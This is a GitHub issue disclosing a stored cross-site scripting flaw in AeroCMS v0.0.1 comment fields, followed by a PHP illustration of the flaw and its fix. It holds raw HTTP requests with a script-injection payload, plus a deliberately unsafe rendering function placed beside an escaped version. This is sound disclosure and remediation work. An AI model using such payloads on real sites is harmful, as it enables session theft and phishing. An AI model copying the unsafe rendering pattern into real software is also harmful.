MegaTKC / AeroCMS

Aero is a simple and easy to use CMS (Content Management System) designed to create fast and powerful web applications!
GNU General Public License v2.0

Stored XSS Vulnerability on AeroCMS v0.0.1 #11

Open rahadchowdhury opened 1 year ago

rahadchowdhury commented 1 year ago

Description: I found a Stored Cross-Site Scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section, in the "Author" and "Content" fields. When I use malicious code or any XSS payload, the browser gives me the result, because a browser cannot know whether the script should be trusted or not.

CMS Version: v0.0.1

Affected URL: http://127.0.0.1/AeroCMS/post.php

Steps to Reproduce:

  1. First, open any post.
  2. Then fill in the comments section; your request data will be:

POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test&comment_email=test@test.com&comment_content=test&create_comment=

  3. The "comment_author" and "comment_content" parameters are vulnerable. Let's try any XSS payload in the "comment_author" and "comment_content" parameters; your request data will be:

POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test"><script>alert(111)</script>&comment_email=test@test.com&comment_content=test"&create_comment=


  4. Now log in to the admin panel and go to the "Comments" menu.
  5. You will see the XSS pop-up (if the admin approves the comment, the XSS pop-up also executes in the post section).


Proof of Concept: You can see the Proof of Concept in the screenshots and video I've attached to confirm the vulnerability.

https://user-images.githubusercontent.com/41516016/224820020-0f0cc2cb-30a1-4722-9ef1-7c14133bf767.mp4

Impact: Attackers can make use of this to conduct attacks like phishing, session stealing, etc.

Let me know if any further info is required.

Thanks & Regards,
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/
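The root cause the report describes is a stored field ("comment_author", "comment_content") being written back into the page without HTML escaping. The following is an added illustration, not AeroCMS code: the hypothetical `render_comment_unsafe()` shows the raw-interpolation pattern that produces the reported behaviour, and `render_comment()` shows the output-encoding fix with `htmlspecialchars()` and `ENT_QUOTES` (so the value is also safe inside a quoted attribute). The `$stored` row is a constructed sample built from the payload shape in the report.

```php
<?php
// Added example (not AeroCMS code). Assumes the comment row is stored exactly as
// submitted and that escaping happens at output time, which is where it belongs.
declare(strict_types=1);

/** Escape a user-controlled string for HTML text content or a double-quoted attribute. */
function h(string $value): string
{
    // ENT_QUOTES escapes both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning an empty string; ENT_HTML5 selects HTML5 entity rules.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable pattern: stored fields interpolated straight into the markup. */
function render_comment_unsafe(array $comment): string
{
    return '<div class="comment" data-author="' . $comment['comment_author'] . '">'
         . '<strong>' . $comment['comment_author'] . '</strong>'
         . '<p>' . $comment['comment_content'] . '</p></div>';
}

/** Hardened pattern: every stored field passes through h() before it reaches the page. */
function render_comment(array $comment): string
{
    return '<div class="comment" data-author="' . h($comment['comment_author']) . '">'
         . '<strong>' . h($comment['comment_author']) . '</strong>'
         . '<p>' . h($comment['comment_content']) . '</p></div>';
}

// Constructed sample row shaped like the report's request body.
$stored = [
    'comment_author'  => 'test"><script>alert(111)</script>',
    'comment_email'   => 'test@test.com',
    'comment_content' => 'test"',
];

echo render_comment_unsafe($stored), PHP_EOL; // attribute broken out of, <script> reaches the browser
echo render_comment($stored), PHP_EOL;        // &quot;&gt;&lt;script&gt;... rendered as literal text

// Cheap regression check for the comments page and the admin "Comments" view:
// escaped output must never contain a raw tag or an unescaped double quote from user data.
assert(strpos(render_comment($stored), '<script') === false);
assert(strpos(render_comment($stored), 'data-author="test"') === false);
```

The same `h()` call has to be applied wherever these fields are displayed, including the admin "Comments" list the report mentions, since the stored value is identical in both places; escaping at insert time instead would leave any other output path (exports, RSS, JSON) either double-encoded or still unescaped.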